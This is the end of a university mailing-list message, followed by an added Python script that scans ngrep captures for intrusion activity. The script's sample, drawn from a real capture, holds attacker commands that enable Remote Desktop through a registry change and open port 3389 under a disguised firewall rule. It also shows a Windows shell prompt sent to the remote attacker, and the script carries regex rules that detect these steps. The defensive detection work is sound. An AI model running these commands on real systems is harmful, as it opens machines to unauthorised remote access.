******************************<wbr>******************************<wbr>**********<br>><br><br><br>--<br><br>Scott Kasai<br>User Support Specialist<br>Engineering Computing Infrastructure<br>University of California, Santa Barbara<br><br><br><br><br><br>______________________________<wbr>_________________<br>Ilab-users mailing list<br><a href="mailto:Ilab-users@lists.cs.ucsb.edu" target="_blank">Ilab-users@lists.cs.ucsb.edu</a><br><a href="https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users" target="_blank">https://lists.cs.ucsb.edu/mail<wbr>man/listinfo/ilab-users</a></p></div></blockquote></div></div></div></div></blockquote></div></div>
</blockquote></div></div>
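<p dir="ltr">Added example, not part of the original thread: a defender-side pass over ngrep text output like the capture quoted above. It flags the inbound commands that switch Remote Desktop on and open TCP 3389, and a Windows shell prompt leaving the monitored host. The sample is constructed from lines of the quoted capture with the mail quoting removed and wrapped headers rejoined; the rule names and function names are hypothetical.</p>

```python
import re

# ngrep prints one header per TCP segment: "T <date> <time> <src> -> <dst> [flags]"
HEADER = re.compile(r"^T (\S+ \S+) (\S+):(\d+) -> (\S+):(\d+) \[(\w+)\]$")
# Hypothetical rules: (name, direction relative to the monitored host, pattern).
RULES = [
    ("rdp_enabled", "in",
     re.compile(r"reg(\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+(0x)?0\b", re.I)),
    ("firewall_opens_3389", "in",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow.*localport=3389\b", re.I)),
    ("shell_prompt_sent_out", "out", re.compile(r"[A-Za-z]:\\[^<>|]*>$")),
]
# Constructed sample: segments taken from the quoted capture, de-quoted and unwrapped.
SAMPLE = r"""
T 2017/01/18 02:46:44.733187 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
reg.exe ADD
"HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
T 2017/01/18 02:46:44.733944 128.111.28.118:20138 -> 188.132.176.26:4000 [AP]
reg.exe ADD
"HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
T 2017/01/18 02:46:45.104905 128.111.28.118:20138 -> 188.132.176.26:4000 [AP]
The operation completed successfully...
C:\ProgramData\MySQL\MySQL Server 5.5\data>
T 2017/01/18 02:46:56.087756 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
netsh advfirewall firewall add rule name = "Windows Service Host"
dir=in action=allow protocol=TCP localport=3389
"""

def parse_segments(text):
    """Split ngrep text output into segments with timestamp, endpoints, payload lines."""
    segments, current = [], None
    for line in text.splitlines():
        m = HEADER.match(line.strip())
        if m:
            current = {"ts": m.group(1), "src": m.group(2), "dst": m.group(4), "payload": []}
            segments.append(current)
        elif current is not None and line.strip():
            current["payload"].append(line.strip())
    return segments

def detect(text, monitored_host):
    """Return (timestamp, rule, remote peer) for each rule hit, in capture order."""
    findings = []
    for seg in parse_segments(text):
        outbound = seg["src"] == monitored_host
        joined = " ".join(seg["payload"])  # a command may wrap across payload lines
        peer = seg["dst"] if outbound else seg["src"]
        for name, direction, rx in RULES:
            # The shell echoes every command back, so each rule is tied to one direction.
            if direction == ("out" if outbound else "in") and rx.search(joined):
                findings.append((seg["ts"], name, peer))
    return findings
```
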